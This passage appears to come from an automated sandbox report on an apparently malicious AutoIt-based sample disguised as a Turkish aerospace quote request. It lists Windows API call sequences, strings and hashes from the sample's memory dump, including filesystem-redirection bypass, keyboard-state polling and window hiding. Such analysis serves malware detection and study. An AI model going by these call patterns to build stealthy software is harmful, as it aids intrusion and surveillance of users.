                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                    • Opcode ID: 0f60f570e2fb159768d5bf60a66e0100d48d634710b392e0b068983b26d07465
                                                                                                                                    • Instruction ID: 1b2f496822f9abaab5c60190cf2e1a7080833b9987e6c48a42660587b72db4e0
                                                                                                                                    • Opcode Fuzzy Hash: 0f60f570e2fb159768d5bf60a66e0100d48d634710b392e0b068983b26d07465
                                                                                                                                    • Instruction Fuzzy Hash: 7BF04F39A80218BBDB159F94EC4DBEDBBB5EF65751F1040A4F809A2260CF719A50CA90
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32 ref: 001DD3AD
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001DD3BF
                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 001DD3E5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                    • API String ID: 145871493-2590602151
                                                                                                                                    • Opcode ID: 1f490e2ad8927c0704d970ed1b1b1934043ea63bd96596d377d68f7c883679ac
                                                                                                                                    • Instruction ID: 0f1930258f7716edec147c4bcddc9f319dcf37f40d939d914f80d159a0321ce0
                                                                                                                                    • Opcode Fuzzy Hash: 1f490e2ad8927c0704d970ed1b1b1934043ea63bd96596d377d68f7c883679ac
                                                                                                                                    • Instruction Fuzzy Hash: 04F0EC758D5611BBDB391B10BC5CDA97324BF21742B66815BF806E2214DF30CD508692
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00184EDD,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E9C
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00184EAE
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00184EDD,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184EC0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                    • API String ID: 145871493-3689287502
                                                                                                                                    • Opcode ID: e0cc1d52823a5851775f500b3d0eb2ca2f75842f8564ad8b92e7e8a58123cc40
                                                                                                                                    • Instruction ID: 8e62aad13d2188d299763c57a9403d9e9328fb16652d7566705d87d0c3dcc937
                                                                                                                                    • Opcode Fuzzy Hash: e0cc1d52823a5851775f500b3d0eb2ca2f75842f8564ad8b92e7e8a58123cc40
                                                                                                                                    • Instruction Fuzzy Hash: 40E0CD39A915236BD2312F257C1CBDF6654AF92F627154115FC04E2100DF64CE0145B4
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,001C3CDE,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E62
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00184E74
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,001C3CDE,?,00251418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00184E87
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                    • API String ID: 145871493-1355242751
                                                                                                                                    • Opcode ID: 095ba3874fe4ccd8a2ab9dda823432cfc957fe7641723643210f3da46ea2b776
                                                                                                                                    • Instruction ID: 15860a5bac030b6b5a8124e8cd60ad2bc1d2277382785565cefd2ab18a680534
                                                                                                                                    • Opcode Fuzzy Hash: 095ba3874fe4ccd8a2ab9dda823432cfc957fe7641723643210f3da46ea2b776
                                                                                                                                    • Instruction Fuzzy Hash: 20D0C2395826226766222B247C0CDCB6A18AF86B113254110B808E2110CF24CF018AE0
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0020A427
                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0020A435
                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0020A468
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0020A63D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                    • Opcode ID: 4db70090e9b540c475fc237446d17b3a7f792a23b83be4e39963d1b93f6e4c9f
                                                                                                                                    • Instruction ID: baf0dca6256909ab898a2c0d3d87b59a18793d2ec652fc343754d38896dca864
                                                                                                                                    • Opcode Fuzzy Hash: 4db70090e9b540c475fc237446d17b3a7f792a23b83be4e39963d1b93f6e4c9f
                                                                                                                                    • Instruction Fuzzy Hash: 6DA1C3716043019FD720DF28D886F2AB7E5AF54714F54885CF55A9B3D2D7B0ED408B92
                                                                                                                                    APIs
                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00223700), ref: 001BBB91
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0025121C,000000FF,00000000,0000003F,00000000,?,?), ref: 001BBC09
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00251270,000000FF,?,0000003F,00000000,?), ref: 001BBC36
                                                                                                                                    • _free.LIBCMT ref: 001BBB7F
                                                                                                                                      • Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
                                                                                                                                      • Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0
                                                                                                                                    • _free.LIBCMT ref: 001BBD4B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1286116820-0
                                                                                                                                    • Opcode ID: 4cb7747babd9832c6170942e8b6bc5c5f48f11924f834419f40f5a157d07c34f
                                                                                                                                    • Instruction ID: 8e9f6adc81db1cbfdf2a5d3f8fa8ac38387f8c70dcdf2fd465d9947e19c452b5
                                                                                                                                    • Opcode Fuzzy Hash: 4cb7747babd9832c6170942e8b6bc5c5f48f11924f834419f40f5a157d07c34f
                                                                                                                                    • Instruction Fuzzy Hash: B151F771908219EFCB14EF69DCC5AEEBBB8EF51310F10426AE814D75A1EBB09E508B50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001ECF22,?), ref: 001EDDFD
                                                                                                                                      • Part of subcall function 001EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001ECF22,?), ref: 001EDE16
                                                                                                                                      • Part of subcall function 001EE199: GetFileAttributesW.KERNEL32(?,001ECF95), ref: 001EE19A
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 001EE473
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001EE4AC
                                                                                                                                    • _wcslen.LIBCMT ref: 001EE5EB
                                                                                                                                    • _wcslen.LIBCMT ref: 001EE603
                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 001EE650
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3183298772-0
                                                                                                                                    • Opcode ID: 90a66c4330714e14eb2d38d6044f1b0c15b9a77a2367afb9fb1b96307cbb2f83
                                                                                                                                    • Instruction ID: 46b77f2163c1438bcb8c6574902e1e269b4cb45aaeccf8d900f8cb14ca3ef42d
                                                                                                                                    • Opcode Fuzzy Hash: 90a66c4330714e14eb2d38d6044f1b0c15b9a77a2367afb9fb1b96307cbb2f83
                                                                                                                                    • Instruction Fuzzy Hash: 2C5173B24087859BC724EB90DC859EFB3ECAF95340F00491EF589D3191EF75A688CB66
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                      • Part of subcall function 0020C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0020B6AE,?,?), ref: 0020C9B5
                                                                                                                                      • Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020C9F1
                                                                                                                                      • Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA68
                                                                                                                                      • Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA9E
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0020BAA5
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0020BB00
                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0020BB63
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 0020BBA6
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0020BBB3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 826366716-0
                                                                                                                                    • Opcode ID: 150cfc3ff81db60b813195286f9abea5a6f83590e4ee781c466da8d3bb17a4ec
                                                                                                                                    • Instruction ID: 76d22e7fe8a7b5f07f354398a0a8446c227d1ae6520255ba1f989fef652cd73c
                                                                                                                                    • Opcode Fuzzy Hash: 150cfc3ff81db60b813195286f9abea5a6f83590e4ee781c466da8d3bb17a4ec
                                                                                                                                    • Instruction Fuzzy Hash: 05619D31218342AFD725DF24C490E2ABBE5FF84308F54895DF4998B2A2DB31ED45CB92
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 001E8BCD
                                                                                                                                    • VariantClear.OLEAUT32 ref: 001E8C3E
                                                                                                                                    • VariantClear.OLEAUT32 ref: 001E8C9D
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 001E8D10
                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001E8D3B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4136290138-0
                                                                                                                                    • Opcode ID: cc438dde0cd20b0b3147bf57237573204b1fb0cb56ebc0b407ce485cfe0d41cd
                                                                                                                                    • Instruction ID: 8d460379165f580d0d1bb06a50f6a619d0583aef4b8a5f9d95b67d70262a2a29
                                                                                                                                    • Opcode Fuzzy Hash: cc438dde0cd20b0b3147bf57237573204b1fb0cb56ebc0b407ce485cfe0d41cd
                                                                                                                                    • Instruction Fuzzy Hash: A7518AB5A00619EFCB14CF69C884AEAB7F9FF89310B118559E909DB350EB30E911CF90
                                                                                                                                    APIs
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001F8BAE
                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 001F8BDA
                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001F8C32
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001F8C57
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001F8C5F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2832842796-0
                                                                                                                                    • Opcode ID: b000677a0160fd03957a0ee03a280a8f23ef1974e60804d942f90216392d8c82
                                                                                                                                    • Instruction ID: 5f0a51600f05509e1a00edc5314abd8f1fe945082f2d6a50ac7370a3ed0582d3
                                                                                                                                    • Opcode Fuzzy Hash: b000677a0160fd03957a0ee03a280a8f23ef1974e60804d942f90216392d8c82
                                                                                                                                    • Instruction Fuzzy Hash: 80515E35A006199FCB04EF64D880AADBBF5FF59314F188058E949AB362CB31ED41CFA0
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00208F40
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00208FD0
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00208FEC
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00209032
                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00209052
                                                                                                                                      • Part of subcall function 0019F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,001F1043,?,7735E610), ref: 0019F6E6
                                                                                                                                      • Part of subcall function 0019F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,001DFA64,00000000,00000000,?,?,001F1043,?,7735E610,?,001DFA64), ref: 0019F70D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 666041331-0
                                                                                                                                    • Opcode ID: 290d84e1d7c3196317ace2111d51dbc3dbedb99121ed1945e8fc3549c7fa86ac
                                                                                                                                    • Instruction ID: 00a44e6ccdfd5921e99297ee71fa7a76bb597e7fe7f654b600498b17af73a530
                                                                                                                                    • Opcode Fuzzy Hash: 290d84e1d7c3196317ace2111d51dbc3dbedb99121ed1945e8fc3549c7fa86ac
                                                                                                                                    • Instruction Fuzzy Hash: 5B514E35604206DFC715EF64C4848ADBBF1FF59314B588098E84A9B7A2DB31EE85CF90
                                                                                                                                    APIs
                                                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00216C33
                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00216C4A
                                                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00216C73
                                                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,001FAB79,00000000,00000000), ref: 00216C98
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00216CC7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3688381893-0
                                                                                                                                    • Opcode ID: 8b2b6b261731df661e2a022e1909f01ca71545e9649f1b0eee6cc8846edacc7b
                                                                                                                                    • Instruction ID: 7d2b3e4d83db230d37a340d4ed7de2c5c17921b8040db12360c6bd71db124baa
                                                                                                                                    • Opcode Fuzzy Hash: 8b2b6b261731df661e2a022e1909f01ca71545e9649f1b0eee6cc8846edacc7b
                                                                                                                                    • Instruction Fuzzy Hash: 7441B339624105AFD724CF28CC5CFED7BE5EB29350F154269F895A72E0C771ADA1CA80
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                    • Opcode ID: 3876d7330f3e215f604b49301e6f30195be9e20f1816aff02552fd5f658582c9
                                                                                                                                    • Instruction ID: 3ef9b7659c2fddc60aa6b847e9450c7087237ad84d0b3087a9c494ec5be2eeeb
                                                                                                                                    • Opcode Fuzzy Hash: 3876d7330f3e215f604b49301e6f30195be9e20f1816aff02552fd5f658582c9
                                                                                                                                    • Instruction Fuzzy Hash: DA41E476A00200AFCB24DF78C881A9DB7F5EF89314F254568F515EB355DB31AD05CB80
                                                                                                                                    APIs
                                                                                                                                    • GetCursorPos.USER32(?), ref: 00199141
                                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 0019915E
                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00199183
                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 0019919D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                    • Opcode ID: 4b7b4cfb7e2178ad698be85c98ca3298394e3633b46e59245841c724fc85ce03
                                                                                                                                    • Instruction ID: e36fe49dc52d91c56c770a648f914be9e0dc217e8ecb5dafde36754aeb5f7458
